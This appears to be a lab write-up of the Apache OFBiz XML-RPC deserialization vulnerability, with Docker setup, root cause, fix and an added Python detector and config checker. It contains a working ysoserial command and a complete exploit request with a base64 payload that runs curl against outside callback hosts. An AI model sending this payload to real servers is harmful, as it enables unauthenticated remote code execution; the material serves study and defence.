OFBiz official site: https://ofbiz.apache.org/
A good reference article:
https://blog.csdn.net/weixin_45728976/article/details/108872281
Affected versions
Apache OFBiz < 17.12.04
Vulnerability principle:
Reach the unauthenticated XML-RPC endpoint, craft a request in the XML-RPC protocol format, and abuse the XML-RPC extension handling to trigger Java deserialization.
Introduction to XML-RPC:
XML-RPC (XML Remote Procedure Call) is a remote procedure call protocol that uses XML to encode and decode method calls and responses. XML-RPC lets different machines communicate over HTTP or other transports, so that methods can be invoked remotely. Its goal is to make communication between different programming languages and platforms simple and standardized.
The basic workings of XML-RPC cover the following steps:
Method call: the client builds an XML-RPC request containing the name of the method to invoke and its parameters, then sends the request to the server.
XML encoding: request and response data are encoded as XML, so they can be transmitted and parsed across different systems.
Method execution: the server receives the request, parses the XML, executes the corresponding method, and produces an XML-RPC response.
XML decoding: the response data is decoded from XML so the client can extract the result it needs.
Result return: the server sends the XML-RPC response back to the client, which decodes it and extracts the result of the method execution.
Setting up the vulnerable environment:
Download the source, import it into IDEA, and start it.
Docker environment:
docker pull andyjunghans/ofbiz
docker run -p 8080:8080 -p 8443:8443 andyjunghans/ofbiz
Once it is running, the OFBiz home page is reachable at https://localhost:8443/myportal/control/main
Exploitation:
The vulnerable URL is https://localhost:8443/webtools/control/xmlrpc
OFBiz ships the CommonsBeanutils1 gadget chain, so the deserialization payload is generated and base64-encoded with:
java -jar ysoserial-0.0.8-SNAPSHOT-all.jar CommonsBeanutils1 "curl http://RCE.bgkjco.dnslog.cn" | base64 | tr -d '\n'
Below is the request packet that is sent; the deserialization data is written in
POST /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Connection: close
Content-Type: application/xml
Content-Length: 4117
<?xml version="1.0"?>
<methodCall>
<methodName>22</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>22</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAAgzK/rq+AAAAMwAcAQAaeXNvc2VyaWFsL1B3bmVyMzA3MzUwNTAzMzIHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAKU291cmNlRmlsZQEAFVB3bmVyMzA3MzUwNTAzMzIuamF2YQEACDxjbGluaXQ+AQADKClWAQAEQ29kZQEAEWphdmEvbGFuZy9SdW50aW1lBwAKAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwADAANCgALAA4BADhjdXJsIGh0dHA6Ly85anRweHdrdWNpenRkem5pNzdrcnN4ZHF6aDU4dHlobi5vYXN0aWZ5LmNvbQgAEAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMABIAEwoACwAUAQANU3RhY2tNYXBUYWJsZQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHABcBAAY8aW5pdD4MABkACAoAGAAaACEAAgAYAAAAAAACAAgABwAIAAEACQAAACQAAwACAAAAD6cAAwFMuAAPEhG2ABVXsQAAAAEAFgAAAAMAAQMAAQAZAAgAAQAJAAAAEQABAAEAAAAFKrcAG7EAAAAAAAEABQAAAAIABnVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXls
b2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+AA14</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Root cause:
The xmlrpc request is defined in webapp/webtools/WEB-INF/controller.xml, and its <security> element sets no auth option. The attribute defaults to false, so the endpoint can be reached without authentication; this is exactly what the later fix changes.
<request-map uri="xmlrpc" track-serverhit="false" track-visit="false">
<security https="false"/>
<event type="xmlrpc"/>
<response name="error" type="none"/>
<response name="success" type="none"/>
</request-map>
Fixed version
Fixed: Apache OFBiz unsafe deserialization of XMLRPC arguments
https://github.com/apache/ofbiz-framework/commit/4bdfb54ffb6e05215dd826ca2902c3e31420287a#diff-b31806fbf9690361ad449e8f263345d8
The fix sets the auth option to true on this request-map in controller.xml, so the xmlrpc endpoint then requires an authenticated session.
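Two defender-side checks for the root cause and the fix described above, as an added example that is not part of the original write-up or of OFBiz: one flags XML-RPC request bodies carrying a <serializable> extension value whose bytes start with the Java serialization header (the "rO0AB" prefix seen in the payload), the other verifies that the xmlrpc request-map in controller.xml carries auth="true". The sample requests and request-maps are constructed for the demonstration.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"  # header of every Java serialization stream ("rO0AB" in base64)

def find_serialized_values(body: str) -> list:
    """Return decoded <serializable> values in an XML-RPC body that start with the
    Java serialization header; any hit deserves an alert, since a legitimate
    client has no reason to ship raw Java objects to this endpoint."""
    hits = []
    root = ET.fromstring(body)
    for node in root.iter(f"{{{EXT_NS}}}serializable"):
        text = "".join((node.text or "").split())  # payload may be wrapped across lines
        try:
            raw = base64.b64decode(text, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw.startswith(JAVA_SER_MAGIC):
            hits.append(raw)
    return hits

def xmlrpc_requires_auth(controller_xml: str) -> bool:
    """True only when the request-map for uri="xmlrpc" has <security auth="true"/>,
    the setting the upstream fix adds; OFBiz treats a missing auth as false."""
    root = ET.fromstring(controller_xml)
    for rm in root.iter("request-map"):
        if rm.get("uri") == "xmlrpc":
            sec = rm.find("security")
            return sec is not None and sec.get("auth", "false").lower() == "true"
    return False

# Constructed samples (hypothetical, not traffic or config from a real OFBiz instance).
_FAKE_OBJECT = base64.b64encode(JAVA_SER_MAGIC + b"constructed-sample").decode()
SUSPICIOUS_REQUEST = f"""<?xml version="1.0"?><methodCall><methodName>22</methodName>
<params><param><value><struct><member><name>22</name><value>
<serializable xmlns="{EXT_NS}">{_FAKE_OBJECT}</serializable>
</value></member></struct></value></param></params></methodCall>"""
BENIGN_REQUEST = """<?xml version="1.0"?><methodCall><methodName>ping</methodName>
<params><param><value><string>hello</string></value></param></params></methodCall>"""
VULNERABLE_MAP = '<request-map uri="xmlrpc"><security https="false"/><event type="xmlrpc"/></request-map>'
FIXED_MAP = '<request-map uri="xmlrpc"><security https="false" auth="true"/><event type="xmlrpc"/></request-map>'
```

Run the detector over captured POST bodies for /webtools/control/xmlrpc, and the config check against each deployed controller.xml.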